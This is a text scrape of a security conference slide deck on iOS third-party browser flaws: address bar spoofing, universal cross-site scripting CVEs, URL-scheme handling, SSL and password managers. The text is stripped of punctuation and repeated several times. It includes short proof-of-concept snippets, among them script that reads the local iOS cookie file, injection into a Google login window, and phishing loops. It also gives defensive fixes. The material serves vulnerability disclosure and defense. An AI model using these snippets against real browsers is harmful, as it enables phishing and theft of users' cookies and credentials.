CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions?
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: runicpl, h0wlu
Thank you
![Page 3: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/3.jpg)
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 4: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/4.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
